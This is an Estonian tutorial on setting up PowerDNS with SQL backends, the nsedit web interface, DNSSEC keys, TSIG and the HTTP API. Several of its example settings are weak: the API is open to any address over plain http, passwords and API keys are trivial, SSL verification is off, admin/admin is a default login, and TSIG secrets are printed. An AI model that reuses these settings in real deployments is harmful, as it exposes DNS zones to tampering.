PowerDNS https://www.powerdns.com/ on üks populaarsetest vaba tarkvaralistest nn alternatiivsetest DNS serveritest, kuigi 'alternatiivse' kohta väidetavalt teda kasutatakse väga massiliselt DNSSEC jaoks. PowerDNS tarkvara võimaldab pidada täielist DNS infrastruktuuri, sh slave ja master pädevate nimeserverite erinevad konfiguratsioonid. PowerDNS tarkvara komplekti kuuluvad

* PowerDNS Authoritative Server - pädev nimeserver
* PowerDNS Recursor - rekursiivne nimeserver
* dnsdist - koormusjaotur

PowerDNS Authoritative Server tarkvaral on sellised tunnused

* võimalus kasutada andmete salvestamiseks erinevaid nn backend'isid (nn plain text, sql andmebaas, ldap kataloog jne)
* väga mugavalt korraldada DNSSEC tsooni pidamist
* DNSSEC puhul on PowerDNS tarkvarale iseloomulik, et kõik DNSSEC moodustatakse käigult, st midagi ei ole salvestatud (well, midagi puhverdatakse, aga rrsig moodi kirjeid jms ei hoita nö tsoonifaili kujul)
* tsoonide käsitlemine (tekitamine, sisu muutmine, eemaldamine) on võimalik üle nn API
* eksisteerivad mitmesugused veebipõhised tsoonide haldusliidesed (otse baasi ja üle API)
* ebamugav on kontrollida, kust tsooni kopeeritakse, kuhu notify saadetakse ja kust lubatakse tsooni kopeerida

Haldusliidesed jagunevad kaheks

* kirjutavad otse samasse sql baasi, mida kasutab PowerDNS ja tegelikult töötavadki ainult SQL backendide puhul - nt Poweradmin, http://www.poweradmin.org/
* suhtlevad PowerDNS'iga üle API, töötavad kõigi backendide puhul - nt nsedit, https://github.com/tuxis-ie/nsedit

Järgnevas tekstis öeldakse lühiduse mõttes PowerDNS ja mõeldakse PowerDNS Authoritative Server ehk pädevat komponenti.

===Tööpõhimõte===

PowerDNS tarkvara saab kasutada erinevates konfiguratsioonides

* nö suure pildi mõttes, nt PowerDNS on varjatud master ja avalikus võrgus teenindavad NSD nimeserverid (alternatiiv oleks pidada PowerDNS nimeserverit otse avalikus võrgus)
* PowerDNS enda komponentidest on välja valitud mingi komplekt, nt baas osa ja PostgreSQL backend (alternatiiv oleks BIND formaadis tekstifailid failisüsteemis)
* tsooniandmete haldamiseks kasutatakse käsurea utiliiti pdnsutil ja nsedit php rakendust

Käesolevas tekstis keskendutakse just mainitud konfiguratsioonile. Kui PowerDNS kasutab SQL backendi, siis avaliku pädeva DNS teenuse pakkumise juures tekitab see vähemalt esmapilgul kahtlusi. Võib olla on hea mõte tekitada varjatud masteriga lahendus

ans1 (NSD) ans2 (NSD)
_____ _____
| | | |
| | | |
|_____| port 8952 |_____| port 8952
| |
| |
----|---------------------|----------------------|----
|
__|__
| | nimetaja (PowerDNS)
| |
|_____|

kus

* ans1, ans2 - avalikud pädevad nimeserverid, tehniliselt slave'id
* nimetaja - varjatud pädev nimeserver, tehniliselt master
* üle port 8952 saab nsd protsessi eemalt juhtida (alternatiiv on juhtida nö tavalisel viisil, lokaalselt)

Käesolevas tekstis pööratakse NSD tarkvara kasutamisele tähelepanu minimaalselt. NSD tekst asub aadressil [[:Pädeva nimeserveri NSD v. 4 kasutamine operatsioonisüsteemiga Debian]].

===Tarkvara paigaldamine ja seadistamine===

Tarkvara paigaldamiseks on üldiselt kaks võimalust

* operatsioonisüsteemi paketihaldus
* PowerDNS repositoorium - https://repo.powerdns.com/

PowerDNS tarkvara on jaotatud komponentideks

* üldosa
* tsoonidega seotud andmete salvesamiseks erinevad backendid (failisüsteem, SQL andembaas jne)

Kui asutakse kasutama SQL backendi, siis võib olla otstarbekas enne PowerDNS vastava backendi paigaldamist baas ise paigaldada ja käivitada; nt nt see baas ei pruugi olla tingimata samas arvutis. Teisipidi, mugavam on samas arvutis, kuna sel juhul baasi saab lähtestada dbconfig süsteemi abil; lisaks, kui kasutatakse DNSSEC'i, siis arvestada, et krüptomaterjal asub baasis. Käesolevas tekstis paigaldatakse tarkvara PowerDNS repositooriumist kuna seal on alati kõige värskem.

====PostgreSQL andmebaasi ettevalmistamine====

PowerDNS tarkvara ei ole PostgreSQL andmebaasi versiooni suhtes nõudlik, tõenäoliselt sobib igasugune v. 9.x ja nt en_US.UTF-8 kodeering

# apt-get install postgresql

====Paigaldamine PowerDNS repositooriumist====

PowerDNS repositoorium asub aadressil https://repo.powerdns.com/ ja kasutamine (Debian v. 9 Stretch juhtumil)

# cat /etc/apt/sources.list.d/pdns.list
deb http://repo.powerdns.com/debian stretch-auth-master main

ning öelda

# curl https://repo.powerdns.com/CBC8B383-pub.asc | sudo apt-key add -
# apt-get update

Tarkvara paigaldamiseks öelda (paistab, et bind backend paigaldatakse lisaks paratamatult)

# apt-get install pdns-server pdns-backend-pgsql

seejuures on valik paigaldada baas db-config süsteemi abil ja see validagi. Tulemusena tekitatakse baasi baasi kasutaja, create database, initsiliseeritakse baasi sisu ning kirjeldatakse PowerDNS backend seadistus

# cat /etc/powerdns/pdns.d/pdns.local.gpgsql.conf
# PostgreSQL Configuration
#
# Launch gpgsql backend
launch+=gpgsql

# gpgsql parameters
gpgsql-host=127.0.0.1
gpgsql-port=
gpgsql-dbname=pdns
gpgsql-user=pdns
gpgsql-password=pdnsparool
gpgsql-dnssec=yes

Vaikimisi käivitatakse PowerDNS protsessid ning natuke saab asuda süsteemi kasutama

# pdns_control list-zones
All zonecount:0

Järgmisena tuleb PowerDNS server seadistada.

====Käsitsi baasi lähtestamine====

Kui db-config süsteemi mitte kasutada, sobib tekitada kasutaja ja create database andmebaas käsitsi

# su - postgres
$ psql
..
postgres=# create role pdns login password 'pdnsparool' NOSUPERUSER INHERIT NOCREATEDB NOCREATEROLE;
postgres=# create database pdns owner = pdns;

ning seejärel laadida baasi sisu, õieti struktuur

# psql -h 127.0.0.1 -U pdns pdns < /usr/share/doc/pdns-backend-pgsql/schema.pgsql.sql

Lisaks peab olema seadistusfail /etc/powerdns/pdns.d/pdns.local.gpgsql.conf sobiva sisuga, vt. eelmist punkti.

===Tarkvara seadistamine===

Üldosa sobiks kokkuvõttes seadistada nt nii

# egrep -v "^$|^#" /etc/powerdns/pdns.conf
allow-axfr-ips=127.0.0.0/8,::1,192.168.1.210
also-notify=192.168.1.210
api=yes
api-key=midagisalajast123
default-soa-mail=hostmaster.moraal.ee.
default-soa-name=ans1.moraal.ee.
include-dir=/etc/powerdns/pdns.d
launch=
master=yes
only-notify=192.168.1.210
security-poll-suffix=
setgid=pdns
setuid=pdns
slave=yes
soa-expire-default=3600000
soa-minimum-ttl=3600
soa-refresh-default=86400
soa-retry-default=7200
webserver=yes
webserver-address=192.168.1.248
webserver-allow-from=0.0.0.0/0,::/0,192.168.10.0/24

kus

* allow-axfr-ips - millistelt ip aadressidelt on lubatud axfr
* also-notify - millistele ip aadressidel töötavatele nimeserveritele saata notify
* api* - api kasutamine (vajalik veebipõhise haldusliidese nsedit jaoks)
* default-soa-* - uue tsooni sisu moodustamisel kasutatavad vaikeväärtused
* only-notify - notify saadetakse ainult näidatud ip aadressidele (mitte tsoonifailides siselduvatele NS serveritele)
* soa-* uue tsooni sisu moodustamisel kasutatavad vaikeväärtused
* webserver* - powerdns sisemise veebiserveri ip aadress jms (saab uurida protsesside statistikat)

Muudatuste kehtestamiseks lõpetada ja käivitada pdns protsessid

# systemctl stop pdns
# systemctl start pdns

===Tsooni sisu haldamine käsurealt===

Tsooni sisu haldamine käsurealt toimub utiliidi pdnsutil abil. Uue tühja tsooni tekitamine (sisaldab SOA kirjet), seejärel tuleb vähemalt NS kirje tekitada (nb! nii tekib Native tüüpi tsoon)

# pdnsutil create-zone moraal.ee

Tulemuse küsimine

# pdnsutil show-zone moraal.ee

Tsooni Native -> Master teisendus

# pdnsutil set-kind moraal.ee master

Tsooni sisu esitamiseks

# pdnsutil list-zone moraal.ee

Sisu muutmiseks, sh muuta käsitsi SOA serial

# pdnsutil edit-zone moraal.ee

utiliidiga seriali suurendamiseks

# pdnsutil increase-serial moraal.ee

Tulemuse küsimine

# dig @127.0.0.1 moraal.ee axfr

Notify käsitsi välja saatmiseks

# pdns_control notify moraal.ee
Added to queue

Kirje lisamine (lisaks tuleb increase serial öelda)

# pdnsutil add-record moraal.ee imre5 A 300 "127.0.0.5"
Feb 21 10:20:54 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
New rrset:
imre5.moraal.ee. IN A 300 127.0.0.5

===Veebipõhine haldusliides nsedit===

Veebipõhiste haldusliideste abil saab

* tekitada ja kustutada tsoone, muuta tsoonide sisu
* loodetavasti haldusliidese abil jäävad tegemata mingid süntaksivead, mida on kerge teha nn BIND-ühilduvat tsoonifaili tavalise tekstieditoriga otse muutes
* tsooni sisu halduse saab usaldada mitte-vi/joe/nano ekspertiisiga inimesele

Paistab, et veebipõhiseid haldusliideseid on omajagu, https://github.com/PowerDNS/pdns/wiki/WebFrontends. nsedit on PHP rakendus. Märkused

* Tsoonis tehtud muudatustega kaasneb automaatselt SOA seriali suurenemine
* Veebiliideses tehtud muudatused ei kajastu alati sama veebiliideses koheselt (nt SOA seriali muutumine, välja ja sisselogimise järel on näha)
* nsedit esitab muudatuste logi
* toimib ipv6 jaoks
* nn õäöü tähti sisaldavaid nimesid sisestada otseselt ei saa
* rakenduse võib paigaldada http:// peale ja seejärel muuta veebiserveri seadistusi ning kasutada edasi https:// abil
* nsedit ei pea asuma samas arvutis PowerDNS serveriga, suhtlemine toimub üle võrgu ja kasutades API liidest

====Ettevalmistused====

nsedit kasutamise eelduseks on selline tarkvara

# apt-get install apache2 php git php-sqlite3 php-curl

====Paigaldamine ja seadistamine====

Kopeerida tarkvara, tundub, et 2017 aasta alguses on praktiline võtta git repo viimane ots

# cd /var/www/html
# git clone https://github.com/tuxis-ie/nsedit.git

Tekitada php skriptide jaoks kasutaja:grupp

# groupadd nsedit
# useradd -g nsedit -m -d /opt/nsedit -s /bin/false nsedit

Avades brauseris http://pdns.moraal.ee/nsedit küsitakse parooli, vaikimisi sobib admin ja admin mille järel

* kontrollitakse vajalike teekide olemasolu
* moodustatakse sqlite3 andmebaas

# sqlite3 /var/www/html/etc/pdns.users.sqlite3
..
sqlite> .tables
logs users zones

nsedit seadistatakse failis /var/www/html/nsedit/includes/config.inc.php

# cp includes/config.inc.php-dist includes/config.inc.php

* ühendust powerdns serveriga üle api juhib sektsioon

# cat /var/www/html/nsedit/includes/config.inc.php | grep '^$api'
$apipass = 'apiparool'; # The PowerDNS API-key
$apiip = '10.0.9.18'; # The IP of the PowerDNS API
$apiport = '8081'; # The port of the PowerDNS API
$apiproto = 'http'; # http | https
$apisslverify = FALSE; # Verify SSL Certificate if using https for apiproto

* vaikeväärtuste kasutamiset haldusliideses kontrollib

$defaults['soa_edit'] = 'INCEPTION-INCREMENT';
$defaults['soa_edit_api'] = 'INCEPTION-INCREMENT';
$defaults['defaulttype'] = 'Master'; # Choose between 'Native' or 'Master'
$defaults['ns'][0] = 'ns1.moraal.ee.'; # The value of the first NS-record
$defaults['ns'][1] = 'ns2.moraal.ee.'; # The value of the second NS-record
$defaults['ttl'] = 3600; # Default TTL for records
$defaults['disabled'] = false; # Default disabled state

Kasutajaliides paistab välja selline

[[Pilt:Pdns-1.gif]]

kus

* TODO

Kui rakendus töötab, muuta rakenduse failide omanik:grupp ära

# chown -R nsedit:nsedit /var/www/html/nsedit

====Kasutamine====

* Kasutajate lisamine, valida (ning märkida linnuke admin user jaoks), tulemusena on nsedit logid paremad

Users -> Add new user

* Uue tsooni lisamine, valida

Zones -> Add new zone

ning sisestada Domain lahtrisse domeeninimi, lõpetades punktiga, nt

test-1.ee.

Kõik muud valikud jätta vaikimisi

Account - admin
Type - master
Template - None

Kuna pdns serveri seadistusfailisis on näidatus SOA kirje väärtused ja nsedit seadisusfailis on kirjeldatud nimeserverid, siis tekib vaikimisi kastutatav tulemus.

* Uue tsooni lisamine kirjeldades korraga palju kirjeid (nt tsooni ületoomisel eelmise dns teenusepakkuja juurest)

Zones -> Import a new zone

seejuures

avanenud dialoogi pasteda tsoonifaili sisu
eemaldada SOA kirje
asendada NS kirjetesse õiged väärtused
kõik nimed (kirje kõige vasem positsioon) peavad olema pikad ja lõppema punktiga
eemaldada linnuke 'Overwrite Nameservers' juurest

* Mitme elemendilise väärtuse puhul tuleb see nii sisestada, nt MX kirje puhul

10 mx.moraal.ee.

* Eeldusel, et on olemas Content tulbas kasutatav A kirje ip aadressile vastav in-addr.arpa tsoon, saab nsedit abil tekitada automaatselt PTR kirje.

====Kasulikud lisamaterjalid====

* https://github.com/tuxis-ie/nsedit

===DNSSEC tsooni esmane juurutamine===

Tundub, et uuemal ajal saab DNSSEC juures kasatada CSK (Combined Signing Key) võtit ja seda kasutab PowerDNS vaikimisi, kuid samas CSK võtmeid registripidajad eriti ei toeta. Ja PowerDNS toetab ka nö klassikalist KSK+ZSK komplekti kasutamist.

====KSK ja ZSK võtmete kasutamine====

Võtmete tsooniga seostamiseks sobib öelda

# pdnsutil add-zone-key moraal.ee ksk 2048 active rsasha256
# pdnsutil add-zone-key moraal.ee zsk 1024 active rsasha256
# pdnsutil set-nsec3 moraal.ee '1 0 5 0...f'
# pdnsutil set-meta moraal.ee SOA-EDIT-API INCEPTION-INCREMENT
# pdnsutil set-meta moraal.ee SOA-EDIT INCEPTION-INCREMENT
# pdnsutil increase-serial moraal.ee
# pdnsutil rectify-zone moraal.ee
# pdnsutil show-zone moraal.ee

mis

* tekitab võtmed
* kui set-meta kogemata vääratab, nt lisati SOA-EDIT-SOA, siis saab meta data eemaldada, st näitamata väärtust

# pdnsutil set-meta moraal.ee SOA-EDIT-SOA

* võtab kasutusele nsec3 hash'ide arvutamiseks vajaliku materjali (0-f on 16-elemendiline juhuslik hex järgnevus, mis saadake nt nii

$ head -c 512 /dev/urandom | sha1sum | cut -b 1-16
7bc59a6dd87fa477

ja ideaalis võiks seda regulaarselt muuta), nt

$ dig +short moraal.ee nsec3param
1 0 5 E7544BB6070C3E0F

(kus 1 - sha1, 0 - opt-out, 5 - iterations, E7544BB6070C3E0F - salt)

* INCEPTION-INCREMENT rida seadistab selliselt, et kui automaaselt tsooni andmed resigneeritakse, siis suurendatakse ka seriali (muidu ei toimu notify ja andmed ei jõua avalikesse pädevatesse nimeserveritesse)
* rectify tuleb põhimõtteliselt öelda peale iga tsooni muudatust, et olla täiesti kindel tsooni toimimises; kui PowerDNS kasutatakse avalike nimeserverite varjatud masterina, pole see probleem

ning tsooni andmed paistavad

# pdnsutil show-zone moraal.ee
Nov 06 23:49:44 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
This is a Master zone
Last SOA serial number we notified: 2016103003 == 2016103003 (serial in the database)
Metadata items:
SOA-EDIT INCEPTION-INCREMENT
SOA-EDIT-API INCEPTION-INCREMENT
Zone has NSEC3 semantics, configuration: 1 0 1 ab
keys:
ID = 11 (ZSK), flags = 256, tag = 26589, algo = 8, bits = 1024 Active ( RSASHA256 )
ID = 10 (KSK), flags = 257, tag = 53461, algo = 8, bits = 2048 Active ( RSASHA256 )
KSK DNSKEY = moraal.ee. IN DNSKEY 257 3 8 AwEAAcn... TQcnQstT+tU= ; ( RSASHA256 )
DS = moraal.ee. IN DS 53461 8 1 6c123b39076072da... c66f62b1e3c388b86b7f ; ( SHA1 digest )
DS = moraal.ee. IN DS 53461 8 2 b85dee98efa6e3bb... 57ce193f728f6b2b1d0dd262 ; ( SHA256 digest )
DS = moraal.ee. IN DS 53461 8 3 1359b0b2b97e60b2... 844b207e84bf5c109eb2e151 ; ( GOST R 34.11-94 digest )
DS = moraal.ee. IN DS 53461 8 4 6d735926cd5cf68b... 9ca2af1f72b3b8f67900bb32a94c ; ( SHA-384 digest )

kus

* kaks võtit, ID väärtustega 10 ja 11

Seejärel tuleb registripidajale öelda DS väärtus.

Tulemuse saab kontrollida nt aadressil http://dnsviz.net/d/moraal.ee/dnssec/.

DNSSEC eemaldamiseks tuleb

* esmalt eemaldada registripidaja juurest DS kirje (reeglina see õnnestub, aga nt 2017 aasta kevadel .org domeenide puhul on tulemuseks dnssec viga, tavaline servfail)
* tsoonis dnssec väljalülitamiseks sobib öelda

# pdnsutil disable-dnssec moraal.ee

====Tulemuse kontrollimine====

Kui kõik juba töötab (ja on vist on vajalik, et kasutada on mõni dnssec-võimeline rekursiivne nimeserver), saab tulemust kontrollida nt nii

$ ldns-rrsig moraal.ee a
moraal.ee RRSIG(a): Thu Oct 27 00:00:00 2016 - Thu Nov 17 00:00:00 2016

====Märkused====

* DNSSEC RRSIG signatuure arvutatakse iga 2 nädala tagant üle selleks, et piirata replay attack võimalusi. Põhimõtteliselt saab pahalane päringule vastuseks saata mõne varasemalt võrgus olnud vastuse (st RRSet + RRSIG komplekti) eeldusel, et ta kontrollib kasutaja võrguliiklust. Tänu RRSIG piiratud kehtivusajale (nt 2 nädalat) saab ta seda teha mitte vanemate kui 2 nädalat andmetega, lisaks ta on piiratud saatma mitte suvalisi vastuseid, vaid viimase kahe nädala jooksul kasutuses olnud vastuseid.

====Kasulikud lisamaterjalid====

* https://blog.powerdns.com/2016/02/02/powerdns-authoritative-the-new-old-way-to-manage-domains/

====CSK võtme kasutamine====

Märkus 2016 lõpus: tundub, et see CSK on mingi tulevikutehnoloogia.

Olemasoleva tsooni jaoks DNSSEC sisselülitamiseks sobib öelda

# pdnsutil secure-zone moraal.ee
# pdnsutil set-nsec3 moraal.ee '1 0 1 ab'
# pdnsutil rectify-zone moraal.ee
# pdnsutil set-meta moraal.ee SOA-EDIT-API INCEPTION-INCREMENT
# pdnsutil increase-serial moraal.ee
# pdnsutil show-zone moraal.ee

Seejärel tuleb registripidajale öelda DS väärtus.

Tulemuse saab kontrollida nt aadressil http://dnsviz.net/d/moraal.ee/dnssec/.

DNSSEC eemaldamiseks tuleb

* esmalt eemaldada registripidaja juurest DS kirje
* tsoonis dnssec väljalülitamiseks sobib öelda

# pdnsutil disable-dnssec moraal.ee

Misc

* tagasi nsec peale viimiseks

# pdnsutil unset-nsec3 moraal.ee

===DNSSEC tsooni seostamine DS sissekande abil ülevalpool oleva tsooniga===

DNSSEC tsooni seostamiseks ülevalpool oleva tsooniga on vaja teada selliseid andmeid

* võtme silt
* võtme tüüp
* algoritm
* avalik võti (või DS mis on avaliku võtme räsi vms)

Need kõik on avalik info ja kättesaadavad domeeni pädevast nimeserverist, aga PowerDNS haldusutiliidiga saab selle küsida otsekoheselt

# pdnsutil show-zone moraal.ee

Ühesõnaga, kui ise kasutatakse PowerDNS'i või partner saadab need andmed, siis allpool toodud dig käsuga tegelemist pole tarvis läbi teha. Tulemust sobib kontrollida nt aadressil http://dnsviz.net/.

====zone.ee keskkonnas - .ee tsoonis====

Logida sisse oma kasutajaga ja valida vasakult paneelist 'Teenuste ülevaade', kõnelaluse tsooni juures pressida rohelist + märki DNSSEC tulbas. Avanenud uuel eraanil vajutada üleval sinist nuppu Aktiveeri (muutub roheliseks), vajutada võtmete nimekirjas + märki ja täita lahtrid

[[Pilt:Pdns-3.gif]]

kus

* võtme silt - (antud juhul 53461), selle saab teada päringu väjundist

$ dig @ns.auul.pri.ee moraal.ee dnskey rrsig | grep DNSKEY
moraal.ee. 10800 IN RRSIG DNSKEY 8 2 10800 20161208000000 20161117000000 53461 moraal.ee. rVy+HAzSKkTRv6...

* võtme tüüp - KSK
* algoritm - 8 (RSA-SHA256)
* avalik võti, selle saab teada päringu väljundist, alates Aw kuni tU= (võib sisaldada tühikuid nagu päringu vastuses on)

$ dig @ns.auul.pri.ee moraal.ee dnskey | grep 257
moraal.ee. 3600 IN DNSKEY 257 3 8 AwEAAcnmmnnOlkRfK9NDYEI6F ... SD6 TQcnQstT+tU=

Vajutada all nuppu Kinnita, muudatus kehtestub peaaegu koheselt (ehk minutite jooksul), aga kasutajaliideses öeldakse

DNSSEC kaitse domeenil MORAAL.EE
Hetkestaatus: DNSSEC on aktiveerimata
Eesootavad muutused: DNSSEC aktiveeritakse

Teha brauseris refresh ja peab olema domeenide nimekirjas DNSSEC tulbas + asemel kilbi kujutis. Edasi läheb nn 15 minutit kuni muudatus zone.ee juurest eestiinternet.ee juurde jõuab ning kehtestub ee. tld (top level domain) nimeserverites. Kontrolliks maksab küsida tld nimeserverilt ds kirjet

$ dig +short @ns.tld.ee moraal.ee ds
30607 8 2 EAC8A17DD2128573F08EE76C18B4AB01734467CD4A376768F5358B0C A2B9463F

====zone.ee keskkonnas - .org tsoonis====

[[Pilt:Pdns-6.gif]]

====GoDaddy keskkonnas====

TODO

===DNSSEC võtmete asendamine===

====ZSK====

====KSK====

KSK moodi võtme lisamiseks sobib öelda, selliselt võib tsooniga siduda ka enam kui kaks võtit

# pdnsutil add-zone-key moraal.ee ksk 2048 active rsasha256

Tsooniga seotud võtmed paistavad käsu väljundis

# pdnsutil show-zone moraal.ee

Tulemusena paistab dnsviz keskkonnas selline pilt

TODO

Tsooniga seotud võtme eemaldamiseks sobib öelda, kus ID on show-zone väljundist välja valitud võtme ID väärtus

# pdnsutil remove-zone-key moraal.ee ID

====Kasulikud lisamaterjalid====

* https://doc.powerdns.com/md/authoritative/howtos/#zsk-rollover

===Mitmesugused haldusprotseduurid===

====tsooni backend muutmine====

TODO

====tsooni toomine PowerDNS kontrolli alla====

Tsooni migreerimiseks suvalisest AXFR-võimelisest nimeserverist sobib

* kirjeldada PowerDNS peal slave

# pdnsutil create-slave-zone moraal.ee 10.0.6.15
Feb 21 22:09:52 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
Creating slave zone 'moraal.ee', with master(s) '10.0.6.15:53'

* kopeerida andmed axfr abil üle, kopeerimist kiirendab

# pdns_control retrieve moraal.ee

* muuta PowerDNS tsooni jaoks masteriks, öeldes

SQL> UPDATE domains set type='MASTER' where type='SLAVE';

Kui allikaks on nt BIND ning tsoonifailis on kasutatud generate konstruktsiooni, siis need lahenduvad automaatselt ära

$GENERATE 1-255 $ IN CNAME $.1-255.40.184.10.in-addr.arpa.

Kasulikud lisamaterjalid

* https://doc.powerdns.com/md/authoritative/migration/

====dnssec tsooni toomine PowerDNS kontrolli alla====

Analoogiliselt eelmisele punktile, aga

* esmalt lülitada dnssec välja, kustutades DS kirje parent tsoonist ja oodates vähemalt DS kirje TTL aja enne järgmise punkti juurde asumist; seejärel on tsooni sisu endine st vanade võtmetega signeeritud andmestik
* tegevused eelmises punktis + uute võtmetega krüptimine
* asuda kasutama uute võtmetega krüptitud tsooni sisu, ja oodata nt 6 tundi
* juurutada parent tsoonis uus DS kirje

====dnssec tsooni toomine PowerDNS kontrolli alla OpenDNSSEC keskkonnast koos vana KSK krüptomaterjaliga====

Eeldusel, et OpenDNSSEC kasutab SoftHSM backendi saab KSK krüptomaterjalid eksportida ja taaskasutada. Ettevalmistuseks tuleb kõnealune tsoon muus osas tavalisel viisil kasutusele võtta. SoftHSM pealt krüptomaterjali eksportimiseks tuleb esmalt teha kindlaks kolm väärust

* SoftHSM label ja pin vaadata nt /etc/opendnssec/conf.xml failist
* kõnealuse tsooni ksk võtme id, vaadata KSK active realt tulp 'CKA_ID'

# ods-ksmutil key list -v

sobib öelda

# softhsm --export moraal.ee-ksk.pem --slot 0 --label "vaartus" --pin vaartus --id vaartus
The key pair has been written to moraal.ee-ksk.pem

teisendada nn BIND kujule

# softhsm-keyconv --tobind --in ksk.pem --name moraal.ee --ksk --algorithm RSASHA256
The private key has been written to Kmoraal.ee+008+09122.private
The public key has been written to Kmoraal.ee+008+09122.key

ning võtta kasutusele PowerDNS juures

# pdnsutil import-zone-key moraal.ee Kksk+008+53675.private active ksk

Edasi seadistatakse DNSSEC analoogliselt nagu seada ikka PowerDNS puhul seadistatakse. Kusjuures 'pdnsutil import-zone-key ...' tulemus on sarnane nagu oleks öeldud

# pdnsutil add-zone-key moraal.ee ksk 2048 active rsasha256

Kasulikud lisamaterjalid

* http://www.molnar-peter.hu/en/

====pdns-control utiliidi kasutamine====

PowerDNS kus on master tsoon saadab notify oma slavedele (nagu on tsoonifaili NS kirjetes kirjas)

# pdns_control notify <domain>

või näidatud ip aadressile

# pdns_control notify-host <domain> <ip-address>

===TSIG kasutamine===

Nimeserverite vahelise tsooniedastuse juures TSIG juurutamiseks tuleb esmalt tekitada võti

# pdnsutil generate-tsig-key from_dns_to_itm hmac-sha256
Generating new key with 64 bytes (this can take a while)
Nov 26 13:10:37 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
Create new TSIG key from_dns_to_itm hmac-sha256 WLuS4o6CX35+yGerdHpl2h3+PDKt76rgam9rqkRg8N+fTP6cGtC6H17rDidKl7FzEu0fukg3apxnZUxdDRDhkQ==

kus

* TODO

ning seejärel võti ühe või enama tsooniedastusega seostada

# pdnsutil activate-tsig-key moraal.ee from_dns_to_itm master

Tulemus paistab nii

<pre>
# pdnsutil show-zone moraal.ee
Nov 26 14:09:44 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
This is a Master zone
Last SOA serial number we notified: 2016112602 == 2016112602 (serial in the database)
Zone is not actively secured
Zone has following allowed TSIG key(s): from_dns_to_itm
Metadata items:
SOA-EDIT-API DEFAULT
TSIG-ALLOW-AXFR from_dns_to_itm
No keys for zone 'moraal.ee'.
</pre>

kontrolliks sobib kopeerida öeldes

$ dig @192.168.1.248 moraal.ee axfr -y "hmac-sha256:from_dns_to_itm:WLuS4o6CX35+yGerdHpl2h3+PDKt76rgam9rqkRg8N+fTP6cGtC6H17rDidKl7FzEu0fukg3apxnZUxdDRDhkQ=="

kusjuures vastuses on üks preudokirje lisaks

..
from_dns_to_itm. 0 ANY TSIG hmac-sha256. 1480164029 300 32 t96WhnpNiAiL5KHXa8UzNthM6/p3ciQptF3Br2ZfhFk= 3538 NOERROR 0
...

Väited

* Sama TSIG võtit saab kasutada mitme tsooni jaoks ja nii on mugavam nt NSD patternit kasutada
* tundub, et tsooni jaoks TSIG juurutamisega kaasneb, et tsooni kopeerimise ip piirang enam ei kehti (lubatud ip pealt pöördudes ei ole võtme esitamine vajalik)
* kui tsooni juures on tsig sisse lülitatud, siis see mõjub nii notify kui xfr jaoks
* TSIG pseudokirjete arv suureneb vastavalt tsooni mahu suurenemisele, https://tools.ietf.org/html/rfc2845 'The TSIG MUST be included on the first and last DNS envelopes. It can be optionally placed on any intermediary envelopes. It is expensive to include it on every envelopes, but it MUST be placed on at least every 100'th envelope.'

Alternatiiv on kasutada -y asemel -k suvandit ja argumendiks failinime, faili sisuga

<pre>
key "from_yks_to_teine" {
algorithm HMAC-SHA256;
secret "YY8xvlL6yGjrt1G4xlfLBaidQOFdvixHgRXN6tXUPMitEKZUs7kl7qixJ0nSN1bbDJQxaFGkoKkBamNS7EPXbw==";
};
</pre>

===API kasutamine===

Üle API muudatuse tegemiseks peab eelnevalt PowerDNS serveris lülitama API sisse ning sisemise webserver käivitama

# cat /etc/powerdns/pdns.conf
..
api=yes
api-key=apiparool
webserver=yes
webserver-address=192.168.1.248
webserver-allow-from=0.0.0.0/0,::/0,192.168.10.0/24
...

ja kasutama nt sellist skripti (töökohaarvutis on seejuures abil kasutada nt jq utiliiti)

<pre>
# cat pdns-api.sh
curl -X PATCH --data \
'{"rrsets":
[{ "name": "www.moraal.ee.",
"records": [{ "content": "192.168.254.5", "disabled": false }],
"ttl": 86000,
"type": "A",
"changetype": "REPLACE"
}]
}' -H 'X-API-Key: midagisalajast123' http://192.168.1.248:8081/api/v1/servers/localhost/zones/moraal.ee. | jq .
</pre>

kus

* TODO

kas käivitamiseks öelda

$ sh pdns-api.sh

API'ga tutvumiseks võib olla hea mõte kuulata pealt mingi olemasoleva API-rakenduse ja serveri vahelist liiklust ja siis seda Wireshark abil uurida.

Kasulikud lisamaterjalid

* https://doc.powerdns.com/md/httpapi/README/ - tundub, et süntaks pole seal kõigis näidetes päris korrektne

===PowerDNS kasutusstatistika===

PowerDNS sisaldab sisemist veebiserverit, mille käest saab küsida teenuse kasutusstatistikat, TODO.

===Logimine===

Tundub, et vaikimisi logitakse syslog'i.

===Varundamine ja taaste===

TODO

===Misc===

====Paigaldamine operatsioonisüsteemi paketihaldusest====

Paigaldamiseks sobib öelda, tuleb paigalda üldosa + mingi backend, nt BIND-ühilduvate tsoonifailide käsitlemise komponent (st failisüsteem)

# apt-get install pdns-server pdns-backend-bind

Tulemusena tekib failisüsteemi

* /etc/powerdns/pdns.conf - peamine seadistusfail

====MySQL backend kasutamine====

Teoreetliselt võib sodida tsooni sisu muutmiseks üldotstarbelise sql editoriga (nt PgAdmin) ka otse baasis, aga praktilisem on kasutada ehk pdnsutil või api't kasutava tarkvara abil, nt nsedit veebiliides.

====pdns-backend-mysql paigaldamine ja seadistamine====

Eeldusel, et MySQL baas juba töötab samas arvutis, sobib paigaldamiseks sobib öelda (seejuures kasutades db-config sistemat, mis paigaldamise käigus tekitab create database baasi, kasutaja, sätib privileegid jne)

# apt-get install pdns-backend-mysql
..
Determining localhost credentials from /etc/mysql/debian.cnf: succeeded.
dbconfig-common: writing config to /etc/dbconfig-common/pdns-backend-mysql.conf

Creating config file /etc/dbconfig-common/pdns-backend-mysql.conf with new version

Creating config file /etc/powerdns/pdns.d/pdns.local.gmysql.conf with new version
checking privileges on database pdns for pdns@localhost: user creation needed.
granting access to database pdns for pdns@localhost: success.
verifying access for pdns@localhost: success.
creating database pdns: success.
verifying database pdns exists: success.
populating database via sql... done.
dbconfig-common: flushing administrative password
Processing triggers for libc-bin (2.24-3) ...
Processing triggers for pdns-server (4.0.1-5) ...

Tulemusena

* tekitatakse MySQL kasutaja pdns
* tekitatakse MySQL create database pdns

====BIND backend kasutamine====

Tundub, et otsekoheselt failisüsteemis tsoonifaili redigeerimise teel on mõeldav töötada ainult BIND-formaadis backendiga. Muudega tuleks kasutada pdnsutil utiliiti või API liidest. Tsoonide nimekiri kirjeldatakse failis

# cat /etc/powerdns/named.conf
# Debian default: supermaster created zones are written here:
